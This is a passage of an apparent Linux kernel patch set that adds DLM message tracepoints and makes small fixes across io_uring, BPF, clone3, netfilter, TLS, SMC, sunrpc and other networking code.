++		  __entry->rc_result, __entry->rc_id, __entry->rc_seq,
++		  __entry->rc_seq_reply,
++		  __print_hex_str(__get_dynamic_array(rc_buf),
++				  __get_dynamic_array_len(rc_buf)))
++
++);
++
++DEFINE_EVENT(dlm_rcom_template, dlm_send_rcom,
++	     TP_PROTO(uint32_t seq, const struct dlm_rcom *rc),
++	     TP_ARGS(seq, rc));
++
++DEFINE_EVENT(dlm_rcom_template, dlm_recv_rcom,
++	     TP_PROTO(uint32_t seq, const struct dlm_rcom *rc),
++	     TP_ARGS(seq, rc));
++
++TRACE_EVENT(dlm_send_message,
++
++	TP_PROTO(uint32_t seq, const struct dlm_message *ms,
++		 const void *name, int namelen),
++
++	TP_ARGS(seq, ms, name, namelen),
++
++	TP_STRUCT__entry(
++		__field(uint32_t, seq)
++		__field(uint32_t, h_version)
++		__field(uint32_t, h_lockspace)
++		__field(uint32_t, h_nodeid)
++		__field(uint16_t, h_length)
++		__field(uint8_t, h_cmd)
++		__field(uint32_t, m_type)
++		__field(uint32_t, m_nodeid)
++		__field(uint32_t, m_pid)
++		__field(uint32_t, m_lkid)
++		__field(uint32_t, m_remid)
++		__field(uint32_t, m_parent_lkid)
++		__field(uint32_t, m_parent_remid)
++		__field(uint32_t, m_exflags)
++		__field(uint32_t, m_sbflags)
++		__field(uint32_t, m_flags)
++		__field(uint32_t, m_lvbseq)
++		__field(uint32_t, m_hash)
++		__field(int32_t, m_status)
++		__field(int32_t, m_grmode)
++		__field(int32_t, m_rqmode)
++		__field(int32_t, m_bastmode)
++		__field(int32_t, m_asts)
++		__field(int32_t, m_result)
++		__dynamic_array(unsigned char, m_extra,
++				le16_to_cpu(ms->m_header.h_length) - sizeof(*ms))
++		__dynamic_array(unsigned char, res_name, namelen)
++	),
++
++	TP_fast_assign(
++		__entry->seq = seq;
++		__entry->h_version = le32_to_cpu(ms->m_header.h_version);
++		__entry->h_lockspace = le32_to_cpu(ms->m_header.u.h_lockspace);
++		__entry->h_nodeid = le32_to_cpu(ms->m_header.h_nodeid);
++		__entry->h_length = le16_to_cpu(ms->m_header.h_length);
++		__entry->h_cmd = ms->m_header.h_cmd;
++		__entry->m_type = le32_to_cpu(ms->m_type);
++		__entry->m_nodeid = le32_to_cpu(ms->m_nodeid);
++		__entry->m_pid = le32_to_cpu(ms->m_pid);
++		__entry->m_lkid = le32_to_cpu(ms->m_lkid);
++		__entry->m_remid = le32_to_cpu(ms->m_remid);
++		__entry->m_parent_lkid = le32_to_cpu(ms->m_parent_lkid);
++		__entry->m_parent_remid = le32_to_cpu(ms->m_parent_remid);
++		__entry->m_exflags = le32_to_cpu(ms->m_exflags);
++		__entry->m_sbflags = le32_to_cpu(ms->m_sbflags);
++		__entry->m_flags = le32_to_cpu(ms->m_flags);
++		__entry->m_lvbseq = le32_to_cpu(ms->m_lvbseq);
++		__entry->m_hash = le32_to_cpu(ms->m_hash);
++		__entry->m_status = le32_to_cpu(ms->m_status);
++		__entry->m_grmode = le32_to_cpu(ms->m_grmode);
++		__entry->m_rqmode = le32_to_cpu(ms->m_rqmode);
++		__entry->m_bastmode = le32_to_cpu(ms->m_bastmode);
++		__entry->m_asts = le32_to_cpu(ms->m_asts);
++		__entry->m_result = le32_to_cpu(ms->m_result);
++		memcpy(__get_dynamic_array(m_extra), ms->m_extra,
++		       __get_dynamic_array_len(m_extra));
++		memcpy(__get_dynamic_array(res_name), name,
++		       __get_dynamic_array_len(res_name));
++	),
++
++	TP_printk("seq=%u h_version=%s h_lockspace=%u h_nodeid=%u "
++		  "h_length=%u h_cmd=%s m_type=%s m_nodeid=%u "
++		  "m_pid=%u m_lkid=%u m_remid=%u m_parent_lkid=%u "
++		  "m_parent_remid=%u m_exflags=%s m_sbflags=%s m_flags=%s "
++		  "m_lvbseq=%u m_hash=%u m_status=%d m_grmode=%s "
++		  "m_rqmode=%s m_bastmode=%s m_asts=%d m_result=%d "
++		  "m_extra=0x%s res_name=0x%s",
++		  __entry->seq, show_message_version(__entry->h_version),
++		  __entry->h_lockspace, __entry->h_nodeid, __entry->h_length,
++		  show_header_cmd(__entry->h_cmd),
++		  show_message_type(__entry->m_type),
++		  __entry->m_nodeid, __entry->m_pid, __entry->m_lkid,
++		  __entry->m_remid, __entry->m_parent_lkid,
++		  __entry->m_parent_remid, show_lock_flags(__entry->m_exflags),
++		  show_dlm_sb_flags(__entry->m_sbflags),
++		  show_lkb_flags(__entry->m_flags), __entry->m_lvbseq,
++		  __entry->m_hash, __entry->m_status,
++		  show_lock_mode(__entry->m_grmode),
++		  show_lock_mode(__entry->m_rqmode),
++		  show_lock_mode(__entry->m_bastmode),
++		  __entry->m_asts, __entry->m_result,
++		  __print_hex_str(__get_dynamic_array(m_extra),
++				  __get_dynamic_array_len(m_extra)),
++		  __print_hex_str(__get_dynamic_array(res_name),
++				  __get_dynamic_array_len(res_name)))
++
++);
++
++TRACE_EVENT(dlm_recv_message,
++
++	TP_PROTO(uint32_t seq, const struct dlm_message *ms),
++
++	TP_ARGS(seq, ms),
++
++	TP_STRUCT__entry(
++		__field(uint32_t, seq)
++		__field(uint32_t, h_version)
++		__field(uint32_t, h_lockspace)
++		__field(uint32_t, h_nodeid)
++		__field(uint16_t, h_length)
++		__field(uint8_t, h_cmd)
++		__field(uint32_t, m_type)
++		__field(uint32_t, m_nodeid)
++		__field(uint32_t, m_pid)
++		__field(uint32_t, m_lkid)
++		__field(uint32_t, m_remid)
++		__field(uint32_t, m_parent_lkid)
++		__field(uint32_t, m_parent_remid)
++		__field(uint32_t, m_exflags)
++		__field(uint32_t, m_sbflags)
++		__field(uint32_t, m_flags)
++		__field(uint32_t, m_lvbseq)
++		__field(uint32_t, m_hash)
++		__field(int32_t, m_status)
++		__field(int32_t, m_grmode)
++		__field(int32_t, m_rqmode)
++		__field(int32_t, m_bastmode)
++		__field(int32_t, m_asts)
++		__field(int32_t, m_result)
++		__dynamic_array(unsigned char, m_extra,
++				le16_to_cpu(ms->m_header.h_length) - sizeof(*ms))
++	),
++
++	TP_fast_assign(
++		__entry->seq = seq;
++		__entry->h_version = le32_to_cpu(ms->m_header.h_version);
++		__entry->h_lockspace = le32_to_cpu(ms->m_header.u.h_lockspace);
++		__entry->h_nodeid = le32_to_cpu(ms->m_header.h_nodeid);
++		__entry->h_length = le16_to_cpu(ms->m_header.h_length);
++		__entry->h_cmd = ms->m_header.h_cmd;
++		__entry->m_type = le32_to_cpu(ms->m_type);
++		__entry->m_nodeid = le32_to_cpu(ms->m_nodeid);
++		__entry->m_pid = le32_to_cpu(ms->m_pid);
++		__entry->m_lkid = le32_to_cpu(ms->m_lkid);
++		__entry->m_remid = le32_to_cpu(ms->m_remid);
++		__entry->m_parent_lkid = le32_to_cpu(ms->m_parent_lkid);
++		__entry->m_parent_remid = le32_to_cpu(ms->m_parent_remid);
++		__entry->m_exflags = le32_to_cpu(ms->m_exflags);
++		__entry->m_sbflags = le32_to_cpu(ms->m_sbflags);
++		__entry->m_flags = le32_to_cpu(ms->m_flags);
++		__entry->m_lvbseq = le32_to_cpu(ms->m_lvbseq);
++		__entry->m_hash = le32_to_cpu(ms->m_hash);
++		__entry->m_status = le32_to_cpu(ms->m_status);
++		__entry->m_grmode = le32_to_cpu(ms->m_grmode);
++		__entry->m_rqmode = le32_to_cpu(ms->m_rqmode);
++		__entry->m_bastmode = le32_to_cpu(ms->m_bastmode);
++		__entry->m_asts = le32_to_cpu(ms->m_asts);
++		__entry->m_result = le32_to_cpu(ms->m_result);
++		memcpy(__get_dynamic_array(m_extra), ms->m_extra,
++		       __get_dynamic_array_len(m_extra));
++	),
++
++	TP_printk("seq=%u h_version=%s h_lockspace=%u h_nodeid=%u "
++		  "h_length=%u h_cmd=%s m_type=%s m_nodeid=%u "
++		  "m_pid=%u m_lkid=%u m_remid=%u m_parent_lkid=%u "
++		  "m_parent_remid=%u m_exflags=%s m_sbflags=%s m_flags=%s "
++		  "m_lvbseq=%u m_hash=%u m_status=%d m_grmode=%s "
++		  "m_rqmode=%s m_bastmode=%s m_asts=%d m_result=%d "
++		  "m_extra=0x%s",
++		  __entry->seq, show_message_version(__entry->h_version),
++		  __entry->h_lockspace, __entry->h_nodeid, __entry->h_length,
++		  show_header_cmd(__entry->h_cmd),
++		  show_message_type(__entry->m_type),
++		  __entry->m_nodeid, __entry->m_pid, __entry->m_lkid,
++		  __entry->m_remid, __entry->m_parent_lkid,
++		  __entry->m_parent_remid, show_lock_flags(__entry->m_exflags),
++		  show_dlm_sb_flags(__entry->m_sbflags),
++		  show_lkb_flags(__entry->m_flags), __entry->m_lvbseq,
++		  __entry->m_hash, __entry->m_status,
++		  show_lock_mode(__entry->m_grmode),
++		  show_lock_mode(__entry->m_rqmode),
++		  show_lock_mode(__entry->m_bastmode),
++		  __entry->m_asts, __entry->m_result,
++		  __print_hex_str(__get_dynamic_array(m_extra),
++				  __get_dynamic_array_len(m_extra)))
++
++);
++
+ TRACE_EVENT(dlm_send,
+ 
+ 	TP_PROTO(int nodeid, int ret),
+diff --git a/io_uring/uring_cmd.c b/io_uring/uring_cmd.c
+index e50de0b6b9f84..18dfc5f6a8b72 100644
+--- a/io_uring/uring_cmd.c
++++ b/io_uring/uring_cmd.c
+@@ -108,7 +108,7 @@ int io_uring_cmd(struct io_kiocb *req, unsigned int issue_flags)
+ 	struct file *file = req->file;
+ 	int ret;
+ 
+-	if (!req->file->f_op->uring_cmd)
++	if (!file->f_op->uring_cmd)
+ 		return -EOPNOTSUPP;
+ 
+ 	ret = security_uring_cmd(ioucmd);
+@@ -120,6 +120,8 @@ int io_uring_cmd(struct io_kiocb *req, unsigned int issue_flags)
+ 	if (ctx->flags & IORING_SETUP_CQE32)
+ 		issue_flags |= IO_URING_F_CQE32;
+ 	if (ctx->flags & IORING_SETUP_IOPOLL) {
++		if (!file->f_op->uring_cmd_iopoll)
++			return -EOPNOTSUPP;
+ 		issue_flags |= IO_URING_F_IOPOLL;
+ 		req->iopoll_completed = 0;
+ 		WRITE_ONCE(ioucmd->cookie, NULL);
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index 7fcbe5d002070..b73169737a01e 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -4163,6 +4163,7 @@ static int btf_datasec_resolve(struct btf_verifier_env *env,
+ 	struct btf *btf = env->btf;
+ 	u16 i;
+ 
++	env->resolve_mode = RESOLVE_TBD;
+ 	for_each_vsi_from(i, v->next_member, v->t, vsi) {
+ 		u32 var_type_id = vsi->type, type_id, type_size = 0;
+ 		const struct btf_type *var_type = btf_type_by_id(env->btf,
+diff --git a/kernel/fork.c b/kernel/fork.c
+index 844dfdc8c639c..a6d243a50be3e 100644
+--- a/kernel/fork.c
++++ b/kernel/fork.c
+@@ -2928,7 +2928,7 @@ static bool clone3_args_valid(struct kernel_clone_args *kargs)
+ 	 * - make the CLONE_DETACHED bit reusable for clone3
+ 	 * - make the CSIGNAL bits reusable for clone3
+ 	 */
+-	if (kargs->flags & (CLONE_DETACHED | CSIGNAL))
++	if (kargs->flags & (CLONE_DETACHED | (CSIGNAL & (~CLONE_NEWTIME))))
+ 		return false;
+ 
+ 	if ((kargs->flags & (CLONE_SIGHAND | CLONE_CLEAR_SIGHAND)) ==
+diff --git a/kernel/watch_queue.c b/kernel/watch_queue.c
+index a6f9bdd956c39..f10f403104e7d 100644
+--- a/kernel/watch_queue.c
++++ b/kernel/watch_queue.c
+@@ -273,6 +273,7 @@ long watch_queue_set_size(struct pipe_inode_info *pipe, unsigned int nr_notes)
+ 	if (ret < 0)
+ 		goto error;
+ 
++	ret = -ENOMEM;
+ 	pages = kcalloc(sizeof(struct page *), nr_pages, GFP_KERNEL);
+ 	if (!pages)
+ 		goto error;
+diff --git a/net/caif/caif_usb.c b/net/caif/caif_usb.c
+index ebc202ffdd8d8..bf61ea4b8132d 100644
+--- a/net/caif/caif_usb.c
++++ b/net/caif/caif_usb.c
+@@ -134,6 +134,9 @@ static int cfusbl_device_notify(struct notifier_block *me, unsigned long what,
+ 	struct usb_device *usbdev;
+ 	int res;
+ 
++	if (what == NETDEV_UNREGISTER && dev->reg_state >= NETREG_UNREGISTERED)
++		return 0;
++
+ 	/* Check whether we have a NCM device, and find its VID/PID. */
+ 	if (!(dev->dev.parent && dev->dev.parent->driver &&
+ 	      strcmp(dev->dev.parent->driver->name, "cdc_ncm") == 0))
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 4dfdcdfd00114..eb0b76acd9df1 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -2805,7 +2805,8 @@ static void sk_enter_memory_pressure(struct sock *sk)
+ static void sk_leave_memory_pressure(struct sock *sk)
+ {
+ 	if (sk->sk_prot->leave_memory_pressure) {
+-		sk->sk_prot->leave_memory_pressure(sk);
++		INDIRECT_CALL_INET_1(sk->sk_prot->leave_memory_pressure,
++				     tcp_leave_memory_pressure, sk);
+ 	} else {
+ 		unsigned long *memory_pressure = sk->sk_prot->memory_pressure;
+ 
+diff --git a/net/ipv4/netfilter/nf_tproxy_ipv4.c b/net/ipv4/netfilter/nf_tproxy_ipv4.c
+index b22b2c745c76c..69e3317996043 100644
+--- a/net/ipv4/netfilter/nf_tproxy_ipv4.c
++++ b/net/ipv4/netfilter/nf_tproxy_ipv4.c
+@@ -38,7 +38,7 @@ nf_tproxy_handle_time_wait4(struct net *net, struct sk_buff *skb,
+ 					    hp->source, lport ? lport : hp->dest,
+ 					    skb->dev, NF_TPROXY_LOOKUP_LISTENER);
+ 		if (sk2) {
+-			inet_twsk_deschedule_put(inet_twsk(sk));
++			nf_tproxy_twsk_deschedule_put(inet_twsk(sk));
+ 			sk = sk2;
+ 		}
+ 	}
+diff --git a/net/ipv4/tcp_bpf.c b/net/ipv4/tcp_bpf.c
+index cf26d65ca3893..ebf9175119370 100644
+--- a/net/ipv4/tcp_bpf.c
++++ b/net/ipv4/tcp_bpf.c
+@@ -186,6 +186,9 @@ static int tcp_bpf_recvmsg_parser(struct sock *sk,
+ 	if (unlikely(flags & MSG_ERRQUEUE))
+ 		return inet_recv_error(sk, msg, len, addr_len);
+ 
++	if (!len)
++		return 0;
++
+ 	psock = sk_psock_get(sk);
+ 	if (unlikely(!psock))
+ 		return tcp_recvmsg(sk, msg, len, flags, addr_len);
+@@ -244,6 +247,9 @@ static int tcp_bpf_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 	if (unlikely(flags & MSG_ERRQUEUE))
+ 		return inet_recv_error(sk, msg, len, addr_len);
+ 
++	if (!len)
++		return 0;
++
+ 	psock = sk_psock_get(sk);
+ 	if (unlikely(!psock))
+ 		return tcp_recvmsg(sk, msg, len, flags, addr_len);
+diff --git a/net/ipv4/udp_bpf.c b/net/ipv4/udp_bpf.c
+index e5dc91d0e0793..0735d820e413f 100644
+--- a/net/ipv4/udp_bpf.c
++++ b/net/ipv4/udp_bpf.c
+@@ -68,6 +68,9 @@ static int udp_bpf_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 	if (unlikely(flags & MSG_ERRQUEUE))
+ 		return inet_recv_error(sk, msg, len, addr_len);
+ 
++	if (!len)
++		return 0;
++
+ 	psock = sk_psock_get(sk);
+ 	if (unlikely(!psock))
+ 		return sk_udp_recvmsg(sk, msg, len, flags, addr_len);
+diff --git a/net/ipv6/ila/ila_xlat.c b/net/ipv6/ila/ila_xlat.c
+index 47447f0241df6..bee45dfeb1874 100644
+--- a/net/ipv6/ila/ila_xlat.c
++++ b/net/ipv6/ila/ila_xlat.c
+@@ -477,6 +477,7 @@ int ila_xlat_nl_cmd_get_mapping(struct sk_buff *skb, struct genl_info *info)
+ 
+ 	rcu_read_lock();
+ 
++	ret = -ESRCH;
+ 	ila = ila_lookup_by_params(&xp, ilan);
+ 	if (ila) {
+ 		ret = ila_dump_info(ila,
+diff --git a/net/ipv6/netfilter/nf_tproxy_ipv6.c b/net/ipv6/netfilter/nf_tproxy_ipv6.c
+index 929502e51203b..52f828bb5a83d 100644
+--- a/net/ipv6/netfilter/nf_tproxy_ipv6.c
++++ b/net/ipv6/netfilter/nf_tproxy_ipv6.c
+@@ -63,7 +63,7 @@ nf_tproxy_handle_time_wait6(struct sk_buff *skb, int tproto, int thoff,
+ 					    lport ? lport : hp->dest,
+ 					    skb->dev, NF_TPROXY_LOOKUP_LISTENER);
+ 		if (sk2) {
+-			inet_twsk_deschedule_put(inet_twsk(sk));
++			nf_tproxy_twsk_deschedule_put(inet_twsk(sk));
+ 			sk = sk2;
+ 		}
+ 	}
+diff --git a/net/netfilter/nf_conntrack_core.c b/net/netfilter/nf_conntrack_core.c
+index 7f0f3bcaae031..30ed45b1b57df 100644
+--- a/net/netfilter/nf_conntrack_core.c
++++ b/net/netfilter/nf_conntrack_core.c
+@@ -96,8 +96,8 @@ static DEFINE_MUTEX(nf_conntrack_mutex);
+ #define GC_SCAN_MAX_DURATION	msecs_to_jiffies(10)
+ #define GC_SCAN_EXPIRED_MAX	(64000u / HZ)
+ 
+-#define MIN_CHAINLEN	8u
+-#define MAX_CHAINLEN	(32u - MIN_CHAINLEN)
++#define MIN_CHAINLEN	50u
++#define MAX_CHAINLEN	(80u - MIN_CHAINLEN)
+ 
+ static struct conntrack_gc_work conntrack_gc_work;
+ 
+diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
+index 733bb56950c14..d095d3c1ceca6 100644
+--- a/net/netfilter/nf_conntrack_netlink.c
++++ b/net/netfilter/nf_conntrack_netlink.c
+@@ -328,11 +328,12 @@ nla_put_failure:
+ }
+ 
+ #ifdef CONFIG_NF_CONNTRACK_MARK
+-static int ctnetlink_dump_mark(struct sk_buff *skb, const struct nf_conn *ct)
++static int ctnetlink_dump_mark(struct sk_buff *skb, const struct nf_conn *ct,
++			       bool dump)
+ {
+ 	u32 mark = READ_ONCE(ct->mark);
+ 
+-	if (!mark)
++	if (!mark && !dump)
+ 		return 0;
+ 
+ 	if (nla_put_be32(skb, CTA_MARK, htonl(mark)))
+@@ -343,7 +344,7 @@ nla_put_failure:
+ 	return -1;
+ }
+ #else
+-#define ctnetlink_dump_mark(a, b) (0)
++#define ctnetlink_dump_mark(a, b, c) (0)
+ #endif
+ 
+ #ifdef CONFIG_NF_CONNTRACK_SECMARK
+@@ -548,7 +549,7 @@ static int ctnetlink_dump_extinfo(struct sk_buff *skb,
+ static int ctnetlink_dump_info(struct sk_buff *skb, struct nf_conn *ct)
+ {
+ 	if (ctnetlink_dump_status(skb, ct) < 0 ||
+-	    ctnetlink_dump_mark(skb, ct) < 0 ||
++	    ctnetlink_dump_mark(skb, ct, true) < 0 ||
+ 	    ctnetlink_dump_secctx(skb, ct) < 0 ||
+ 	    ctnetlink_dump_id(skb, ct) < 0 ||
+ 	    ctnetlink_dump_use(skb, ct) < 0 ||
+@@ -831,8 +832,7 @@ ctnetlink_conntrack_event(unsigned int events, const struct nf_ct_event *item)
+ 	}
+ 
+ #ifdef CONFIG_NF_CONNTRACK_MARK
+-	if (events & (1 << IPCT_MARK) &&
+-	    ctnetlink_dump_mark(skb, ct) < 0)
++	if (ctnetlink_dump_mark(skb, ct, events & (1 << IPCT_MARK)))
+ 		goto nla_put_failure;
+ #endif
+ 	nlmsg_end(skb, nlh);
+@@ -2735,7 +2735,7 @@ static int __ctnetlink_glue_build(struct sk_buff *skb, struct nf_conn *ct)
+ 		goto nla_put_failure;
+ 
+ #ifdef CONFIG_NF_CONNTRACK_MARK
+-	if (ctnetlink_dump_mark(skb, ct) < 0)
++	if (ctnetlink_dump_mark(skb, ct, true) < 0)
+ 		goto nla_put_failure;
+ #endif
+ 	if (ctnetlink_dump_labels(skb, ct) < 0)
+diff --git a/net/netfilter/nft_last.c b/net/netfilter/nft_last.c
+index bb15a55dad5c0..eaa54964cf23c 100644
+--- a/net/netfilter/nft_last.c
++++ b/net/netfilter/nft_last.c
+@@ -104,11 +104,15 @@ static void nft_last_destroy(const struct nft_ctx *ctx,
+ static int nft_last_clone(struct nft_expr *dst, const struct nft_expr *src)
+ {
+ 	struct nft_last_priv *priv_dst = nft_expr_priv(dst);
++	struct nft_last_priv *priv_src = nft_expr_priv(src);
+ 
+ 	priv_dst->last = kzalloc(sizeof(*priv_dst->last), GFP_ATOMIC);
+ 	if (!priv_dst->last)
+ 		return -ENOMEM;
+ 
++	priv_dst->last->set = priv_src->last->set;
++	priv_dst->last->jiffies = priv_src->last->jiffies;
++
+ 	return 0;
+ }
+ 
+diff --git a/net/netfilter/nft_quota.c b/net/netfilter/nft_quota.c
+index e6b0df68feeaf..410a5fcf88309 100644
+--- a/net/netfilter/nft_quota.c
++++ b/net/netfilter/nft_quota.c
+@@ -235,12 +235,16 @@ static void nft_quota_destroy(const struct nft_ctx *ctx,
+ static int nft_quota_clone(struct nft_expr *dst, const struct nft_expr *src)
+ {
+ 	struct nft_quota *priv_dst = nft_expr_priv(dst);
++	struct nft_quota *priv_src = nft_expr_priv(src);
++
++	priv_dst->quota = priv_src->quota;
++	priv_dst->flags = priv_src->flags;
+ 
+ 	priv_dst->consumed = kmalloc(sizeof(*priv_dst->consumed), GFP_ATOMIC);
+ 	if (!priv_dst->consumed)
+ 		return -ENOMEM;
+ 
+-	atomic64_set(priv_dst->consumed, 0);
++	*priv_dst->consumed = *priv_src->consumed;
+ 
+ 	return 0;
+ }
+diff --git a/net/nfc/netlink.c b/net/nfc/netlink.c
+index 348bf561bc9fb..b9264e730fd93 100644
+--- a/net/nfc/netlink.c
++++ b/net/nfc/netlink.c
+@@ -1446,8 +1446,8 @@ static int nfc_se_io(struct nfc_dev *dev, u32 se_idx,
+ 	return rc;
+ 
+ error:
+-	kfree(cb_context);
+ 	device_unlock(&dev->dev);
++	kfree(cb_context);
+ 	return rc;
+ }
+ 
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index d9413d43b1045..e8018b0fb7676 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -2644,16 +2644,14 @@ static int smc_sendmsg(struct socket *sock, struct msghdr *msg, size_t len)
+ {
+ 	struct sock *sk = sock->sk;
+ 	struct smc_sock *smc;
+-	int rc = -EPIPE;
++	int rc;
+ 
+ 	smc = smc_sk(sk);
+ 	lock_sock(sk);
+-	if ((sk->sk_state != SMC_ACTIVE) &&
+-	    (sk->sk_state != SMC_APPCLOSEWAIT1) &&
+-	    (sk->sk_state != SMC_INIT))
+-		goto out;
+ 
++	/* SMC does not support connect with fastopen */
+ 	if (msg->msg_flags & MSG_FASTOPEN) {
++		/* not connected yet, fallback */
+ 		if (sk->sk_state == SMC_INIT && !smc->connect_nonblock) {
+ 			rc = smc_switch_to_fallback(smc, SMC_CLC_DECL_OPTUNSUPP);
+ 			if (rc)
+@@ -2662,6 +2660,11 @@ static int smc_sendmsg(struct socket *sock, struct msghdr *msg, size_t len)
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
++	} else if ((sk->sk_state != SMC_ACTIVE) &&
++		   (sk->sk_state != SMC_APPCLOSEWAIT1) &&
++		   (sk->sk_state != SMC_INIT)) {
++		rc = -EPIPE;
++		goto out;
+ 	}
+ 
+ 	if (smc->use_fallback) {
+diff --git a/net/sunrpc/svc.c b/net/sunrpc/svc.c
+index 24577d1b99079..9ee32e06f877e 100644
+--- a/net/sunrpc/svc.c
++++ b/net/sunrpc/svc.c
+@@ -787,6 +787,7 @@ svc_start_kthreads(struct svc_serv *serv, struct svc_pool *pool, int nrservs)
+ static int
+ svc_stop_kthreads(struct svc_serv *serv, struct svc_pool *pool, int nrservs)
+ {
++	struct svc_rqst	*rqstp;
+ 	struct task_struct *task;
+ 	unsigned int state = serv->sv_nrthreads-1;
+ 
+@@ -795,7 +796,10 @@ svc_stop_kthreads(struct svc_serv *serv, struct svc_pool *pool, int nrservs)
+ 		task = choose_victim(serv, pool, &state);
+ 		if (task == NULL)
+ 			break;
+-		kthread_stop(task);
++		rqstp = kthread_data(task);
++		/* Did we lose a race to svo_function threadfn? */
++		if (kthread_stop(task) == -EINTR)
++			svc_exit_thread(rqstp);
+ 		nrservs++;
+ 	} while (nrservs < 0);
+ 	return 0;
+diff --git a/net/tls/tls_device.c b/net/tls/tls_device.c
+index 6c593788dc250..a7cc4f9faac28 100644
+--- a/net/tls/tls_device.c
++++ b/net/tls/tls_device.c
+@@ -508,6 +508,8 @@ handle_error:
+ 			zc_pfrag.offset = iter_offset.offset;
+ 			zc_pfrag.size = copy;
+ 			tls_append_frag(record, &zc_pfrag, copy);
++
++			iter_offset.offset += copy;
+ 		} else if (copy) {
+ 			copy = min_t(size_t, copy, pfrag->size - pfrag->offset);
+ 
+diff --git a/net/tls/tls_main.c b/net/tls/tls_main.c
+index 3735cb00905df..b32c112984dd9 100644
+--- a/net/tls/tls_main.c
++++ b/net/tls/tls_main.c
+@@ -405,13 +405,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(crypto_info_aes_gcm_128->iv,
+ 		       cctx->iv + TLS_CIPHER_AES_GCM_128_SALT_SIZE,
+ 		       TLS_CIPHER_AES_GCM_128_IV_SIZE);
+ 		memcpy(crypto_info_aes_gcm_128->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_AES_GCM_128_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval,
+ 				 crypto_info_aes_gcm_128,
+ 				 sizeof(*crypto_info_aes_gcm_128)))
+@@ -429,13 +427,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(crypto_info_aes_gcm_256->iv,
+ 		       cctx->iv + TLS_CIPHER_AES_GCM_256_SALT_SIZE,
+ 		       TLS_CIPHER_AES_GCM_256_IV_SIZE);
+ 		memcpy(crypto_info_aes_gcm_256->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_AES_GCM_256_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval,
+ 				 crypto_info_aes_gcm_256,
+ 				 sizeof(*crypto_info_aes_gcm_256)))
+@@ -451,13 +447,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(aes_ccm_128->iv,
+ 		       cctx->iv + TLS_CIPHER_AES_CCM_128_SALT_SIZE,
+ 		       TLS_CIPHER_AES_CCM_128_IV_SIZE);
+ 		memcpy(aes_ccm_128->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_AES_CCM_128_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval, aes_ccm_128, sizeof(*aes_ccm_128)))
+ 			rc = -EFAULT;
+ 		break;
+@@ -472,13 +466,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(chacha20_poly1305->iv,
+ 		       cctx->iv + TLS_CIPHER_CHACHA20_POLY1305_SALT_SIZE,
+ 		       TLS_CIPHER_CHACHA20_POLY1305_IV_SIZE);
+ 		memcpy(chacha20_poly1305->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_CHACHA20_POLY1305_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval, chacha20_poly1305,
+ 				sizeof(*chacha20_poly1305)))
+ 			rc = -EFAULT;
+@@ -493,13 +485,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(sm4_gcm_info->iv,
+ 		       cctx->iv + TLS_CIPHER_SM4_GCM_SALT_SIZE,
+ 		       TLS_CIPHER_SM4_GCM_IV_SIZE);
+ 		memcpy(sm4_gcm_info->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_SM4_GCM_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval, sm4_gcm_info, sizeof(*sm4_gcm_info)))
+ 			rc = -EFAULT;
+ 		break;
+@@ -513,13 +503,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(sm4_ccm_info->iv,
+ 		       cctx->iv + TLS_CIPHER_SM4_CCM_SALT_SIZE,
+ 		       TLS_CIPHER_SM4_CCM_IV_SIZE);
+ 		memcpy(sm4_ccm_info->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_SM4_CCM_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval, sm4_ccm_info, sizeof(*sm4_ccm_info)))
+ 			rc = -EFAULT;
+ 		break;
+@@ -535,13 +523,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(crypto_info_aria_gcm_128->iv,
+ 		       cctx->iv + TLS_CIPHER_ARIA_GCM_128_SALT_SIZE,
+ 		       TLS_CIPHER_ARIA_GCM_128_IV_SIZE);
+ 		memcpy(crypto_info_aria_gcm_128->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_ARIA_GCM_128_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval,
+ 				 crypto_info_aria_gcm_128,
+ 				 sizeof(*crypto_info_aria_gcm_128)))
